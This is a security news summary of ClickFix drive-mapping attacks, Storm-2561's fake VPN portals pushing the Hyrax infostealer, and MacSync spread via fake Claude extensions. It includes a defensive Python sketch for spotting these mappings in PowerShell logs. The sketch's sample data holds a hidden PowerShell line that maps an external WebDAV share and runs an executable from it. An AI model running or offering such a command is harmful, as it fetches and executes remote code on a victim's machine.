Originally reported by Hackread
TL;DR
Security researchers have identified an evolution in ClickFix social engineering attacks, with new variants mapping attacker-controlled network drives, Storm-2561 using fake Fortinet/Ivanti VPN sites to distribute Hyrax infostealer, and MacSync malware targeting developers via fraudulent Claude AI extensions.
Several social engineering campaigns are currently active, each using refined lures to deliver infostealers and other malware; one of them is run by the Microsoft-tracked threat actor Storm-2561. No mass exploitation has been confirmed, but the campaigns target high-value victims, including software developers.
Social engineering campaigns leveraging the ClickFix technique have expanded their technical arsenal, moving beyond simple browser troubleshooting lures to more sophisticated attack vectors targeting different user populations.
Researchers have documented a new ClickFix variant that tricks Windows users into running hidden PowerShell commands that map an attacker-controlled network share as a local drive. According to the report, this gives the threat actor persistent access to the victim system while the command appears to the user to be a legitimate troubleshooting step.
The attack leverages users' trust in technical support workflows, presenting fake error messages that prompt victims to run "diagnostic" commands that actually establish connections to malicious infrastructure.
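The drive-mapping variant leaves a usable trace: the PowerShell command the victim pastes is recorded by script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) when that logging is enabled. The following detection sketch is an added example, not code from Hackread or the researchers cited; it flags script blocks that create a drive or path mapping to a host outside the organisation. The internal domain suffix, the address ranges, the host names and the sample events are all constructed for the example.

```python
"""
Detection sketch for ClickFix-style network drive mapping.

Input: a list of PowerShell script block log entries (Event ID 4104),
reduced here to the RecordId and ScriptBlockText fields.
Output: findings for mapping commands whose target host is not internal.

All sample data below is constructed; the hosts and ranges are assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass

# Assumption: the organisation's file servers live under this DNS suffix
# or inside these private ranges. Anything else is treated as external.
INTERNAL_HOST_SUFFIXES = (".corp.example",)
INTERNAL_NETWORKS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# Commands that create a mapping (net use, New-PSDrive, New-SmbMapping)
# or change directly into a UNC path (cd, pushd, Set-Location).
MAP_CMD_RE = re.compile(
    r"\b(net(?:\.exe)?\s+use|New-PSDrive|New-SmbMapping|pushd|cd|Set-Location)\b",
    re.I,
)
# UNC host, including the WebDAV forms \\host@SSL\ and \\host@SSL@443\.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)(?:@SSL)?(?:@\d+)?\\")
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


@dataclass
class Finding:
    record_id: int
    host: str
    command: str
    reason: str


def is_internal(host: str) -> bool:
    """True if the host is an internal name or a private IP address."""
    h = host.lower()
    if h.endswith(INTERNAL_HOST_SUFFIXES):
        return True
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        return False  # a public DNS name we do not own
    return any(ip in net for net in INTERNAL_NETWORKS)


def target_hosts(script: str) -> list:
    """Every UNC or URL host referenced in a script block."""
    hosts = [m.group(1) for m in UNC_RE.finditer(script)]
    hosts += [m.group(1) for m in URL_RE.finditer(script)]
    return hosts


def analyse(events) -> list:
    """Return a Finding for each mapping command that targets an external host."""
    findings = []
    for ev in events:
        text = ev["ScriptBlockText"]
        if not MAP_CMD_RE.search(text):
            continue
        for host in target_hosts(text):
            if is_internal(host):
                continue
            reason = "drive mapping to external host"
            if HIDDEN_RE.search(text):
                reason += "; hidden window"  # typical of pasted ClickFix one-liners
            findings.append(Finding(ev["RecordId"], host, text.strip(), reason))
    return findings


# Constructed sample events (hosts and IPs are made up).
SAMPLE_EVENTS = [
    # Benign: internal file server, persistent mapping by an admin script.
    {"RecordId": 101, "ScriptBlockText": r"net use Z: \\fs01.corp.example\finance /persistent:yes"},
    # Benign: internal address.
    {"RecordId": 102, "ScriptBlockText": r"New-PSDrive -Name S -PSProvider FileSystem -Root \\10.20.30.40\software"},
    # Suspicious: hidden window, WebDAV share on a public IP, then runs a file from it.
    {"RecordId": 103, "ScriptBlockText": r'powershell -w hidden -c "net use Y: \\203.0.113.7@SSL@443\DavWWWRoot\fix; Start-Process Y:\update.exe"'},
    # Suspicious: external host name mapped via New-PSDrive.
    {"RecordId": 104, "ScriptBlockText": r"New-PSDrive -Name X -PSProvider FileSystem -Root \\support-fix.example.net\share"},
    # Not a mapping at all.
    {"RecordId": 105, "ScriptBlockText": r"Get-ChildItem C:\Users"},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.reason} ({f.host}): {f.command}")
```

The allowlist approach is deliberate: an attacker can register any name, so matching on known-bad hosts would only catch yesterday's campaign, whereas a mapping to any host you do not own is worth a look regardless of the lure text. Treat the `-w hidden` flag as an enrichment, not a requirement; it is absent when the victim pastes the command directly into an already-open PowerShell window.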
Microsoft Defender Experts identified Storm-2561, a threat actor using fake Fortinet and Ivanti VPN login portals to distribute Hyrax infostealer malware. The campaign, active since mid-January 2026, targets organizations by spoofing legitimate VPN infrastructure.
The attack chain begins with convincing replica sites of popular enterprise VPN solutions. Users attempting to authenticate are instead served malware payloads designed to harvest credentials and system information.
7AI security researchers documented a Claude Fraud campaign deploying MacSync malware against software developers. The attack uses fraudulent browser extensions claiming to enhance Claude AI functionality, distributed through malicious Google advertisements.
The campaign specifically targets tech professionals by exploiting the growing adoption of AI development tools. Fake extensions appear in search results for legitimate Claude AI utilities, leading developers to install information-stealing malware disguised as productivity enhancements.
These campaigns demonstrate the continued evolution of social engineering techniques, with threat actors adapting to target specific professional groups and leveraging emerging technology trends. The ClickFix methodology has proven effective enough to warrant expansion into new technical domains.
The combination of drive mapping, VPN spoofing, and AI tool impersonation represents a sophisticated understanding of different user trust models and technical environments.